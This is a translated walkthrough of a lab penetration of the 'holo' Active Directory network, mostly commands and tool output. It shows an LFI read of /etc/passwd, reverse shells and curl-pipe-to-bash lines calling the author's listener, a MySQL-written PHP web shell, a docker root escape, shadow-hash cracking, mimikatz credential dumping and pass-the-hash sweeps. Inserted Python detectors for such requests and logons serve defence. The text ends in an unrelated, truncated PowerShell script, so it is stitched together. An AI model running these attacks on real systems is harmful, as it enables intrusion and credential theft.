[Target machine] holo: AD domain penetration & web_lab: external network penetration, internal network penetration

Summary: Video tutorial: [[Target machine] holo: AD domain penetration & web_lab (1): external network penetration, internal network penetration] https://www.bilibili.com/video/BV13G4y1j7xF/?share_source=copy_web&vd_source=21485fc93994c5f47b14e02ed42e0e49

holo


┌──(zacarx㉿zacarx)-[~]
└─$ nmap -T4 10.200.110.33 -A 
Starting Nmap 7.92 ( https://nmap.org ) at 2022-12-26 16:04 CST
Nmap scan report for 10.200.110.33 (10.200.110.33)
Host is up (0.19s latency).
Not shown: 982 closed tcp ports (conn-refused)
PORT      STATE    SERVICE            VERSION
22/tcp    open     ssh                OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 41:38:8d:8a:ee:8a:4b:6c:f9:f0:a3:79:e8:96:3b:36 (RSA)
|   256 63:66:d6:68:60:67:9a:36:ae:d1:99:b7:8b:66:4e:6d (ECDSA)
|_  256 87:00:d8:b1:c7:63:5e:9c:30:8c:3d:e1:d0:5a:79:63 (ED25519)
80/tcp    open     http               Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-generator: WordPress 5.5.3
| http-robots.txt: 21 disallowed entries (15 shown)
| /var/www/wordpress/index.php 
| /var/www/wordpress/readme.html /var/www/wordpress/wp-activate.php 
| /var/www/wordpress/wp-blog-header.php /var/www/wordpress/wp-config.php 
| /var/www/wordpress/wp-content /var/www/wordpress/wp-includes 
| /var/www/wordpress/wp-load.php /var/www/wordpress/wp-mail.php 
| /var/www/wordpress/wp-signup.php /var/www/wordpress/xmlrpc.php 
| /var/www/wordpress/license.txt /var/www/wordpress/upgrade 
|_/var/www/wordpress/wp-admin /var/www/wordpress/wp-comments-post.php
|_http-title: holo.live
109/tcp   filtered pop2
465/tcp   filtered smtps
720/tcp   filtered unknown
911/tcp   filtered xact-backup
999/tcp   filtered garcon
1110/tcp  filtered nfsd-status
1259/tcp  filtered opennl-voice
1524/tcp  filtered ingreslock
2222/tcp  filtered EtherNetIP-1
5959/tcp  filtered unknown
5960/tcp  filtered unknown
6003/tcp  filtered X11:3
6668/tcp  filtered irc
6881/tcp  filtered bittorrent-tracker
8093/tcp  filtered unknown
14000/tcp filtered scotty-ft
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
┌──(zacarx㉿zacarx)-[~]
└─$ wpscan --url "http://10.200.110.33" --enumerate u

....


[+] Headers
 | Interesting Entries:
 |  - Server: Apache/2.4.29 (Ubuntu)
 |  - X-UA-Compatible: IE=edge
 | Found By: Headers (Passive Detection)
 | Confidence: 100%

[+] robots.txt found: http://10.200.110.33/robots.txt
 | Found By: Robots Txt (Aggressive Detection)
 | Confidence: 100%

[+] XML-RPC seems to be enabled: http://10.200.110.33/xmlrpc.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%
 | References:
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] WordPress readme found: http://10.200.110.33/readme.html
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 100%

[+] The external WP-Cron seems to be enabled: http://10.200.110.33/wp-cron.php
 | Found By: Direct Access (Aggressive Detection)
 | Confidence: 60%
 | References:
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
 |  - https://github.com/wpscanteam/wpscan/issues/1299

[+] WordPress version 5.5.3 identified (Insecure, released on 2020-10-30).
 | Found By: Emoji Settings (Passive Detection)
 |  - http://10.200.110.33/, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=5.5.3'
 | Confirmed By: Meta Generator (Passive Detection)
 |  - http://10.200.110.33/, Match: 'WordPress 5.5.3'

[i] The main theme could not be detected.
[+] Enumerating Users (via Passive and Aggressive Methods)
 Brute Forcing Author IDs - Time: 00:00:01 <================================================================================> (10 / 10) 100.00% Time: 00:00:01

[i] User(s) Identified:

[+] admin
 | Found By: Wp Json Api (Aggressive Detection)
 |  - http://10.200.110.33/wp-json/wp/v2/users/?per_page=100&page=1
 | Confirmed By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
┌──(zacarx㉿zacarx)-[~/SecLists/Discovery/DNS]
└─$ gobuster vhost -u holo.live -w ./subdomains-top1million-5000.txt -t 1
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:          http://holo.live
[+] Method:       GET
[+] Threads:      1
[+] Wordlist:     ./subdomains-top1million-5000.txt
[+] User Agent:   gobuster/3.1.0
[+] Timeout:      10s
===============================================================
2022/12/26 16:31:44 Starting gobuster in VHOST enumeration mode
===============================================================

...
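Because of network problems there were a large number of 432 errors, so I have not copied them here.
In the end it found the dev and admin subdomains.

We brute-force directories on these three domains.

Results: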

www.holo.live/robots.txt
dev.holo.live/about.php
dev.holo.live/img.php
dev.holo.live/index.php

User-agent: *
Disallow: /var/www/admin/db.php
Disallow: /var/www/admin/dashboard.php
Disallow: /var/www/admin/supersecretdir/creds.txt

Later, I found that dev.holo.live has a local file inclusion (LFI) vulnerability.

Let's try the payload we used: http://dev.holo.live/img.php?file=../../../etc/passwd

Result:

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
mysql:x:101:101:MySQL Server,,,:/nonexistent:/bin/false

Using this vulnerability we can find and retrieve the admin credentials:

I know you forget things, so I'm leaving this note for you:
admin:DBManagerLogin!
- gurag <3

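In the page source of the admin site we found a ?cmd= command execution vulnerability,

so we use cmd to set up a reverse shell.

Recommended: bash -c 'bash -i >& /dev/tcp/10.50.107.175/8888 0>&1'

Then we find the db_config file: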

<?php

define('DB_SRV', '192.168.100.1');
define('DB_PASSWD', "!123SecureAdminDashboard321!");
define('DB_USER', 'admin');
define('DB_NAME', 'DashboardDB');

$connection = mysqli_connect(DB_SRV, DB_USER, DB_PASSWD, DB_NAME);

if($connection == false){

        die("Error: Connection to Database could not be made." . mysqli_connect_error());
}
?>
find / -type f -name "*.dockerenv" -ls 2>/dev/null

This tells us we are inside a container and need to escape.

python3 -c 'import pty;pty.spawn("/bin/bash")'

We connect to MySQL:

mysql -u admin -p -h 192.168.100.1

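But there was no output.

So once again I recommend pentestmonkey:

Reverse Shell Cheat Sheet | pentestmonkey

Later I found that

python3 -c 'import pty; pty.spawn("/bin/bash")'

works, but

python -c 'import pty; pty.spawn("/bin/bash")'

does not.

Lesson learned, painfully.

Finally, in the database we find: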

mysql> select * from users;
select * from users;
+----------+-----------------+
| username | password        |
+----------+-----------------+
| admin    | DBManagerLogin! |
| gurag    | AAAA            |
+----------+-----------------+
2 rows in set (0.00 sec)

Next we use the database to break out further:

CREATE TABLE hax(Code varchar(255));
INSERT INTO hax (Code) value ('<?php $cmd=$_GET[\"cmd\"]\;system($cmd)\;?>');
mysql> SELECT * FROM hax;
SELECT * FROM hax;
+-----------------------------------------+
| Code                                    |
+-----------------------------------------+
| <?php $cmd=$_GET["cmd"];system($cmd);?> |
+-----------------------------------------+
1 row in set (0.00 sec)

We check the secure_file_priv variable:

mysql> SHOW VARIABLES LIKE "secure_file_priv";
SHOW VARIABLES LIKE "secure_file_priv";
+------------------+----------------+
| Variable_name    | Value          |
+------------------+----------------+
| secure_file_priv | /var/www/html/ |
+------------------+----------------+
1 row in set (0.00 sec)

So we write the file out:

SELECT * FROM hax INTO OUTFILE '/var/www/html/hax.php';
www-data@14c75992b944:/tmp/babbadeckl$ for i in {1..10000};do 2>/dev/null > /dev/tcp/192.168.100.1/$i && echo Port $i open;done
Port 22 open
Port 80 open
Port 3306 open
Port 8080 open

Check that it works:

curl 192.168.100.1:8080/hax.php?cmd=id
curl http://192.168.100.1:8080/hax.php?cmd=nc+-e+/bin/sh+10.50.107.175+9999
This method no longer seems to work,
so we switch to another approach.

find / -perm -u=s -type f 2>/dev/null

On Kali we create 1.sh

with the following content:

#!/bin/bash
bash -i >& /dev/tcp/10.50.107.175/999 0>&1

Then start an HTTP server

and listen with msf:

msfconsole
use multi/handler
set LHOST tun0
set LPORT 53
run

Then in our shell we run:

curl 192.168.100.1:8080/hax.php?cmd=curl%20http%3A%2F%2F10.50.107.175%3A80%2F1.sh%7Cbash%20%26
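
Seen from the defender's side, the img.php?file= traversal and the hax.php?cmd= requests above all leave recognisable entries in the web server's access log. The following is an added example, not part of the original write-up: a small detector for those two request shapes. The log lines, client addresses, rule names and the list of suspicious parameter names are constructed for illustration.

```python
"""Flag traversal and command-execution requests in Apache access logs."""
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Prefix of the Apache common/combined log format.
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3}) '
)

RULES = {
    # ../ or ..\ sequences, or a direct reference to a sensitive file
    "path-traversal": re.compile(r"\.\.[\\/]|/etc/(?:passwd|shadow)\b"),
    # pipe into a shell, nc -e, /dev/tcp redirection, fetching a remote
    # script, command substitution
    "command-injection": re.compile(
        r"/dev/tcp/|\|\s*(?:ba)?sh\b|\bnc(?:at)?\b.*\s-e\b"
        r"|\b(?:curl|wget)\s+https?://|\$\(|`"
    ),
}
# Assumption: parameter names that should never reach a production handler.
EXEC_PARAM_NAMES = {"cmd", "exec", "command"}


def fully_decode(value, max_rounds=3):
    """Undo repeated URL-encoding (%252e -> %2e -> .) so rules see plain text."""
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value


def scan_line(line):
    """Return one finding per (parameter, rule) hit in a single log line."""
    match = LOG_RE.match(line)
    if not match:
        return []
    url = urlsplit(match["target"])
    findings = []
    for name, raw in parse_qsl(url.query, keep_blank_values=True):
        value = fully_decode(raw)
        hits = [rule for rule, pattern in RULES.items() if pattern.search(value)]
        if name.lower() in EXEC_PARAM_NAMES:
            hits.append("exec-parameter")
        for rule in hits:
            findings.append({
                "client": match["client"],
                "path": url.path,
                "param": name,
                "rule": rule,
                "value": value,
                # a 2xx status means the application accepted the request
                "served": match["status"].startswith("2"),
            })
    return findings


def scan_log(text):
    """Scan a whole log and return all findings in order."""
    findings = []
    for line in text.splitlines():
        findings.extend(scan_line(line))
    return findings


# Constructed sample log; the request paths mirror the ones used above.
SAMPLE_LOG = """\
203.0.113.7 - - [26/Dec/2022:16:40:01 +0800] "GET /img.php?file=images/logo.png HTTP/1.1" 200 5120
203.0.113.7 - - [26/Dec/2022:16:41:12 +0800] "GET /img.php?file=../../../etc/passwd HTTP/1.1" 200 1024
203.0.113.7 - - [26/Dec/2022:16:41:30 +0800] "GET /img.php?file=%252e%252e%252f%252e%252e%252fetc%252fpasswd HTTP/1.1" 404 196
198.51.100.9 - - [26/Dec/2022:17:02:44 +0800] "GET /index.php?s=cats+%26+dogs HTTP/1.1" 200 8812
198.51.100.23 - - [26/Dec/2022:17:10:05 +0800] "GET /hax.php?cmd=id HTTP/1.1" 200 54
198.51.100.23 - - [26/Dec/2022:17:11:19 +0800] "GET /hax.php?cmd=nc+-e+/bin/sh+10.50.107.175+9999 HTTP/1.1" 200 0
198.51.100.23 - - [26/Dec/2022:17:12:40 +0800] "GET /hax.php?cmd=curl%20http%3A%2F%2F10.50.107.175%3A80%2F1.sh%7Cbash%20%26 HTTP/1.1" 200 0
"""

if __name__ == "__main__":
    for finding in scan_log(SAMPLE_LOG):
        state = "SERVED" if finding["served"] else "rejected"
        print(f'{finding["client"]:15} {finding["rule"]:18} {state:8} '
              f'{finding["path"]}?{finding["param"]}={finding["value"]}')
```

Findings with `served` set deserve attention first: a 2xx answer to a traversal or `cmd=` request means the input reached the application rather than being rejected.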

Press Ctrl+Z to exit.

search post/multi/manage/shell_to_meterpreter
use 0
set session 1
curl -L https://github.com/carlospolop/PEASS-ng/releases/latest/download/linpeas.sh >> linpeas.sh

chmod +x linpeas.sh

upload linpeas.sh

shell

chmod 777 linpeas.sh

./linpeas.sh >> linpeas.txt
find / -perm -u=s -type f 2>/dev/null
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/openssh/ssh-keysign
/usr/bin/umount
/usr/bin/docker
/usr/bin/fusermount
/usr/bin/newgrp
/usr/bin/pkexec
/usr/bin/su
/usr/bin/gpasswd
/usr/bin/passwd
/usr/bin/at
/usr/bin/chfn
/usr/bin/sudo
/usr/bin/mount
/usr/bin/chsh

docker looks a bit suspicious, so we search for whether it can be abused.

Found it!

docker | GTFOBins

So we run:

/usr/bin/docker run -v /:/mnt --rm -it alpine chroot /mnt sh

It fails with:

Unable to find image 'alpine:latest' locally

We run docker ps -a

to get an image, and substitute it:

python3 -c 'import pty; pty.spawn("/bin/bash")'
/usr/bin/docker run -v /:/mnt --rm -it cb1b741122e8 chroot /mnt sh
But we are still inside the container,
so we run
docker image ls
and find the Ubuntu version:
/usr/bin/docker run -v /:/mnt --rm -it ubuntu:18.04 chroot /mnt sh

We cat the /etc/shadow file

and get:

# cat /etc/shadow
cat /etc/shadow
root:$6$TvYo6Q8EXPuYD8w0$Yc.Ufe3ffMwRJLNroJuMvf5/Telga69RdVEvgWBC.FN5rs9vO0NeoKex4jIaxCyWNPTDtYfxWn.EM4OLxjndR1:18605:0:99999:7:::
daemon:*:18512:0:99999:7:::
bin:*:18512:0:99999:7:::
sys:*:18512:0:99999:7:::
sync:*:18512:0:99999:7:::
games:*:18512:0:99999:7:::
man:*:18512:0:99999:7:::
lp:*:18512:0:99999:7:::
mail:*:18512:0:99999:7:::
news:*:18512:0:99999:7:::
uucp:*:18512:0:99999:7:::
proxy:*:18512:0:99999:7:::
www-data:*:18512:0:99999:7:::
backup:*:18512:0:99999:7:::
list:*:18512:0:99999:7:::
irc:*:18512:0:99999:7:::
gnats:*:18512:0:99999:7:::
nobody:*:18512:0:99999:7:::
systemd-network:*:18512:0:99999:7:::
systemd-resolve:*:18512:0:99999:7:::
systemd-timesync:*:18512:0:99999:7:::
messagebus:*:18512:0:99999:7:::
syslog:*:18512:0:99999:7:::
_apt:*:18512:0:99999:7:::
tss:*:18512:0:99999:7:::
uuidd:*:18512:0:99999:7:::
tcpdump:*:18512:0:99999:7:::
sshd:*:18512:0:99999:7:::
landscape:*:18512:0:99999:7:::
pollinate:*:18512:0:99999:7:::
ec2-instance-connect:!:18512:0:99999:7:::
systemd-coredump:!!:18566::::::
ubuntu:!$6$6/mlN/Q.1gopcuhc$7ymOCjV3RETFUl6GaNbau9MdEGS6NgeXLM.CDcuS5gNj2oIQLpRLzxFuAwG0dGcLk1NX70EVzUUKyUQOezaf0.:18601:0:99999:7:::
lxd:!:18566::::::
mysql:!:18566:0:99999:7:::
dnsmasq:*:18566:0:99999:7:::
linux-admin:$6$Zs4KmlUsMiwVLy2y$V8S5G3q7tpBMZip8Iv/H6i5ctHVFf6.fS.HXBw9Kyv96Qbc2ZHzHlYHkaHm8A5toyMA3J53JU.dc6ZCjRxhjV1:18570:0:99999:7:::

Then we crack the hash with hashcat:

hashcat -a 0 -m 1800 p.txt /usr/share/wordlists/rockyou.txt

This gives the password linuxrulez.

sshuttle -r linux-admin@10.200.111.33 10.200.111.0/24

ssh-keygen -t rsa

This generates a key pair.

Add our own key to /root/.ssh/authorized_keys.

nmap does not seem to work.

So

we SSH into 10.200.110.33:

root@ip-10-200-110-33:~# nmap -sP 10.200.110.0/24
Starting Nmap 7.80 ( https://nmap.org ) at 2022-12-28 06:25 UTC
Nmap scan report for ip-10-200-110-1.eu-west-1.compute.internal (10.200.110.1)
Host is up (0.00012s latency).
MAC Address: 02:27:12:F2:56:27 (Unknown)
Nmap scan report for ip-10-200-110-30.eu-west-1.compute.internal (10.200.110.30)
Host is up (0.0011s latency).
MAC Address: 02:7B:52:BC:1E:D3 (Unknown)
Nmap scan report for ip-10-200-110-31.eu-west-1.compute.internal (10.200.110.31)
Host is up (0.00041s latency).
MAC Address: 02:2D:A4:13:01:2F (Unknown)
Nmap scan report for ip-10-200-110-32.eu-west-1.compute.internal (10.200.110.32)
Host is up (0.00032s latency).
MAC Address: 02:3E:0F:BB:96:B3 (Unknown)
Nmap scan report for ip-10-200-110-35.eu-west-1.compute.internal (10.200.110.35)
Host is up (0.0011s latency).
MAC Address: 02:90:CD:DE:93:AD (Unknown)
Nmap scan report for ip-10-200-110-250.eu-west-1.compute.internal (10.200.110.250)
Host is up (0.00059s latency).
MAC Address: 02:FC:B2:BC:42:65 (Unknown)
Nmap scan report for ip-10-200-110-33.eu-west-1.compute.internal (10.200.110.33)
Host is up.
Nmap done: 256 IP addresses (7 hosts up) scanned in 1.70 seconds

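We find that

10.200.110.31

has a login page.

The page has a password reset function, and we get past it very easily through a logic flaw.

Later we spotted a file upload vulnerability.

This was covered before:

we simply block the JavaScript

and the upload goes through easily.

Note that my first attempt failed

because I used a Linux PHP reverse shell file.

After that we have a shell.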

Download mimikatz:

Download mimikatz from SourceForge.net

Then upload it:

powershell.exe Invoke-WebRequest http://10.50.107.175/mimikatz.exe -outfile mimikatz.exe

.\mimikatz.exe "privilege::debug" "token::elevate" "sekurlsa::logonpasswords" exit

Output:

.\mimikatz.exe "privilege::debug" "token::elevate" "sekurlsa::logonpasswords" exit

  .#####.   mimikatz 2.2.0 (x64) #19041 Sep 19 2022 17:44:08
 .## ^ ##.  "A La Vie, A L'Amour" - (oe.eo)
 ## / \ ##  /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 ## \ / ##       > https://blog.gentilkiwi.com/mimikatz
 '## v ##'       Vincent LE TOUX             ( vincent.letoux@gmail.com )
  '#####'        > https://pingcastle.com / https://mysmartlogon.com ***/

mimikatz(commandline) # privilege::debug
Privilege '20' OK

mimikatz(commandline) # token::elevate
Token Id  : 0
User name : 
SID name  : NT AUTHORITY\SYSTEM

668    {0;000003e7} 1 D 21351         NT AUTHORITY\SYSTEM    S-1-5-18    (04g,21p)    Primary
 -> Impersonated !
 * Process Token : {0;000003e7} 0 D 2076472       NT AUTHORITY\SYSTEM    S-1-5-18    (04g,28p)    Primary
 * Thread Token  : {0;000003e7} 1 D 2100336       NT AUTHORITY\SYSTEM    S-1-5-18    (04g,21p)    Impersonation (Delegation)

mimikatz(commandline) # sekurlsa::logonpasswords

Authentication Id : 0 ; 306323 (00000000:0004ac93)
Session           : Interactive from 1
User Name         : watamet
Domain            : HOLOLIVE
Logon Server      : DC-SRV01
Logon Time        : 12/28/2022 5:34:26 AM
SID               : S-1-5-21-471847105-3603022926-1728018720-1132
    msv :    
     [00000003] Primary
     * Username : watamet
!!!!!
     * Domain   : HOLOLIVE
     * NTLM     : d8d41e6cf762a8c77776a1843d4141c9
!!!!
     * SHA1     : 7701207008976fdd6c6be9991574e2480853312d
     * DPAPI    : 300d9ad961f6f680c6904ac6d0f17fd0
    tspkg :    
    wdigest :    
     * Username : watamet
     * Domain   : HOLOLIVE
     * Password : (null)
    kerberos :    


!!!
     * Username : watamet
     * Domain   : HOLO.LIVE
     * Password : Nothingtoworry!
     
!!!!
    ssp :    
    credman :    

mimikatz(commandline) # exit
Bye!

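Next we use

CrackMapExec: a post-exploitation tool for large Windows Active Directory (AD) environments

Passing-the-Hash

CME supports authenticating over SMB with a Passing-the-Hash attack using the -H flag:

crackmapexec smb <target(s)> -u username -H NTHASH

This lets us find the existing SMB servers on the internal network:

crackmapexec smb 10.200.110.0/24 -u watamet -d HOLOLIVE -H d8d41e6cf762a8c77776a1843d4141c9

Output: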
┌──(zacarx㉿zacarx)-[~]
└─$ crackmapexec smb 10.200.110.0/24 -u watamet -d HOLOLIVE -H d8d41e6cf762a8c77776a1843d4141c9
SMB         10.200.110.30   445    DC-SRV01         [*] Windows 10.0 Build 17763 x64 (name:DC-SRV01) (domain:HOLOLIVE) (signing:False) (SMBv1:False)
SMB         10.200.110.35   445    PC-FILESRV01     [*] Windows 10.0 Build 17763 x64 (name:PC-FILESRV01) (domain:HOLOLIVE) (signing:False) (SMBv1:False)
SMB         10.200.110.31   445    S-SRV01          [*] Windows 10.0 Build 17763 x64 (name:S-SRV01) (domain:HOLOLIVE) (signing:False) (SMBv1:False)
SMB         10.200.110.30   445    DC-SRV01         [+] HOLOLIVE\watamet:d8d41e6cf762a8c77776a1843d4141c9 
SMB         10.200.110.35   445    PC-FILESRV01     [+] HOLOLIVE\watamet:d8d41e6cf762a8c77776a1843d4141c9 
SMB         10.200.110.31   445    S-SRV01          [+] HOLOLIVE\watamet:d8d41e6cf762a8c77776a1843d4141c9 (Pwn3d!)
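
The sweep above authenticates one account over NTLM to every SMB host in the subnet within seconds, which is visible in Windows Security logs as a burst of event 4624 network logons. The following is an added example, not part of the original write-up: a detector for that fan-out pattern. The events are constructed (host names taken from the output above, source address and the accounts alice and bob invented), and the two-minute window and three-host threshold are assumptions to tune per environment.

```python
"""Flag one source/account pair making NTLM network logons to many hosts."""
from collections import defaultdict
from datetime import datetime, timedelta

TS_FORMAT = "%Y-%m-%dT%H:%M:%S"


def is_ntlm_network_logon(event):
    """Successful logon (4624), network type (3), NTLM, not a machine account."""
    return (
        event.get("EventID") == 4624
        and event.get("LogonType") == 3
        and event.get("AuthenticationPackageName") == "NTLM"
        and not event.get("TargetUserName", "").endswith("$")
    )


def find_fanout(events, window=timedelta(minutes=2), min_hosts=3):
    """Return one alert per (source, account) that reaches min_hosts distinct
    computers inside a sliding time window."""
    logons = defaultdict(list)
    for event in events:
        if is_ntlm_network_logon(event):
            key = (event["IpAddress"], event["TargetUserName"].lower())
            when = datetime.strptime(event["TimeCreated"], TS_FORMAT)
            logons[key].append((when, event["Computer"]))

    alerts = []
    for (source, account), seen in logons.items():
        seen.sort()
        start = 0
        for end in range(len(seen)):
            # shrink the window from the left until it spans <= `window`
            while seen[end][0] - seen[start][0] > window:
                start += 1
            hosts = sorted({host for _, host in seen[start:end + 1]})
            if len(hosts) >= min_hosts:
                alerts.append({"source": source, "account": account,
                               "hosts": hosts, "first_seen": seen[start][0]})
                break
    return alerts


def _event(ts, computer, user, ip, package="NTLM", logon_type=3):
    """Build a constructed 4624 record with only the fields the rule reads."""
    return {"EventID": 4624, "TimeCreated": ts, "Computer": computer,
            "TargetUserName": user, "IpAddress": ip,
            "AuthenticationPackageName": package, "LogonType": logon_type}


# Constructed events, as they might be collected from the three hosts.
SAMPLE_EVENTS = [
    # burst: same account, same source, three hosts in two seconds
    _event("2022-12-28T06:40:01", "DC-SRV01", "watamet", "10.200.110.33"),
    _event("2022-12-28T06:40:02", "PC-FILESRV01", "watamet", "10.200.110.33"),
    _event("2022-12-28T06:40:02", "S-SRV01", "watamet", "10.200.110.33"),
    # Kerberos logons to three hosts: ignored, not NTLM
    _event("2022-12-28T07:00:00", "DC-SRV01", "alice", "10.200.110.40", "Kerberos"),
    _event("2022-12-28T07:00:05", "PC-FILESRV01", "alice", "10.200.110.40", "Kerberos"),
    _event("2022-12-28T07:00:09", "S-SRV01", "alice", "10.200.110.40", "Kerberos"),
    # NTLM to three hosts, but spread over a working day: below the rate
    _event("2022-12-28T08:00:00", "DC-SRV01", "bob", "10.200.110.41"),
    _event("2022-12-28T11:00:00", "PC-FILESRV01", "bob", "10.200.110.41"),
    _event("2022-12-28T15:00:00", "S-SRV01", "bob", "10.200.110.41"),
    # machine account: ignored
    _event("2022-12-28T06:41:00", "DC-SRV01", "S-SRV01$", "10.200.110.31"),
]

if __name__ == "__main__":
    for alert in find_fanout(SAMPLE_EVENTS):
        print(f'{alert["account"]} from {alert["source"]} reached '
              f'{", ".join(alert["hosts"])} starting {alert["first_seen"]}')
```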

We connect:

smbclient //10.200.110.35/Users -U HOLOLIVE/watamet

and get user.txt.

Run:

xfreerdp /u:watamet /p:'Nothingtoworry!' /v:10.200.110.35

Once on the desktop, open PowerShell.

We use a helper tool: https://github.com/carlospolop/winPE/tree/master/binaries/seatbelt

r3motecontrol/Ghostpack-CompiledBinaries: Compiled Binaries for Ghostpack (.NET v4.0) (github.com)

Download it to Kali, then upload it:

powershell.exe Invoke-WebRequest http://10.50.107.175/SeatbeltNet3.5x64.exe -outfile sb.exe

./sb.exe -group=system

We find that it is locked and cannot run, so we try an AppLocker bypass.

Run secpol.msc

Unfortunately that did not help.

We found a bypass project:

api0cradle/UltimateAppLockerByPassList: The goal of this repository is to document the most common techniques to bypass AppLocker. (github.com)

We enter:

#A hacky script to convert YML to MD file the way I want
#Author: Oddvar Moe
#If you can use it, be my guest!

function Convert-YamlToMD
{
    [CmdletBinding()]
    Param
    (
        [Parameter(Mandatory=$true)]
        $YamlObject,

        [Parameter(Mandatory=$true)]
        [String]
        $Outfile
    )

    Begin
    {
    }
    Process
    {
        # Header
        "`#`# $($YamlObject.Name)" | Add-Content $Outfile
        "``````" | Add-Content $Outfile
        foreach($cmd in $YamlObject.Commands)
        {
            "`n$($cmd.command)" | Add-Content $Outfile
            "$($cmd.description)" | Add-Content $Outfile
        }
        "``````" | Add-Content $Outfile
        "* Windows binary: $($YamlObject.'Windows Binary')   " | Add-Content $Outfile
        "* Bypasses Default AppLocker Rules: $($YamlObject.'Bypasses Default AppLocker Rules')   " | Add-Content $Outfile
        "* Mitre: `[$($YamlObject.MITRE.ID)`]`($($YamlObject.MITRE.Link)`)   " | Add-Content $Outfile
        
        "   " | Add-Content $Outfile

        "* Links:   " | Add-Content $Outfile
        foreach($link in $YamlObject.Resources)
        {
            "  * $($link.link)" | Add-Content $Outfile
        }

        "   " | Add-Content $Outfile

        "* File path:   " | Add-Content $Outfile
        foreach($path in $YamlObject.'Full path')
        {
           "  * $($path.path)" | Add-Content $outfile
        }
        
        "   " | Add-Content $Outfile
        
        "* Acknowledgement:   " | Add-Content $Outfile
        foreach($person in $YamlObject.Acknowledgement)
        {
            "  * Name: $($person.Name)" | Add-Content $Outfile
            "    * Twitter: `[$($person.TwitterHandle)`]`(https://twitter.com/$($person.TwitterHandle)`)" | Add-Content $Outfile
            "    * Blog: $($person.Blog)" | Add-Content $Outfile
        }
        
        "   " | Add-Content $Outfile

        "OS:  " | Add-Content $Outfile
        foreach($OS in $YamlObject.'Verified on OS')
        {
            if($OS.Values -eq "true")
            {
                "`- `[x`] $($OS.Keys)" | Add-Content $Outfile
            }
        }

    }
    End
    {
    }
}


function Add-MainIndex
{
    [CmdletBinding()]
    Param
    (
        [Parameter(Mandatory=$true)]
        $YamlObject,

        [Parameter(Mandatory=$true)]
        [String]
        $Outfile
    )

    Begin
    {
    }
    Process
    {
        # Header
        # OS BINARIES
        #[Atbroker.exe](OSBinaries/Atbroker.md)    
        "`[$($YamlObject.Name)`]`(md/$($YamlObject.Name).md`)" | Add-Content $Outfile
        "" | Add-Content $Outfile
    }
    End
    {
    }
}

function New-MainIndex
{
    [CmdletBinding()]
    Param
    (
        [Parameter(Mandatory=$true)]
        [String]
        $Outfile,

        [ValidateSet("Verified","NotVerified")]
        [Parameter(Mandatory=$true)]
        [String]
        $Status
    )

    Begin
    {
    }
    Process
    {
        # Verified Header
        if($Status -eq "Verified")
        {
            "`# Verified AppLocker bypasses for Default rules" | Add-Content $Outfile
            "This list contains all the bypasses that has been verified to bypass AppLocker default rules." | Add-Content $Outfile
            "" | Add-Content $Outfile
        }

        #NotVerified Header
        if($Status -eq "NotVerified")
        {
            "`# Potential bypasses" | Add-Content $Outfile
            "This list contains all the bypasses that has NOT been verified, or does not bypass the default AppLocker rules (but can bypass AppLocker in other ways) or is a claimed bypass." | Add-Content $Outfile
            "" | Add-Content $Outfile
        }
    }
    End
    {
    }
}

$mainpath = "C:\data\gitprojects\UltimateAppLockerByPassList"

# Read yaml files
$bins = @()
cd "$mainpath\yml"
get-childitem | foreach{ 
    [string[]]$fileContent = Get-Content $_
    $content = ''
    foreach ($line in $fileContent) { $content = $content + "`n" + $line }
    $yaml = ConvertFrom-YAML $content
    $bins += $yaml
}

#Initialize index files
New-MainIndex -Status Verified -Outfile $mainpath"\VerifiedAppLockerBypasses.md"
New-MainIndex -Status NotVerified -Outfile $mainpath"\UnverifiedAppLockerBypasses.md"

$bins | foreach{
WRITE-HOST "$($_.name)"

Convert-YamlToMD -YamlObject $_ -Outfile "$mainpath\md\$($_.name).md"
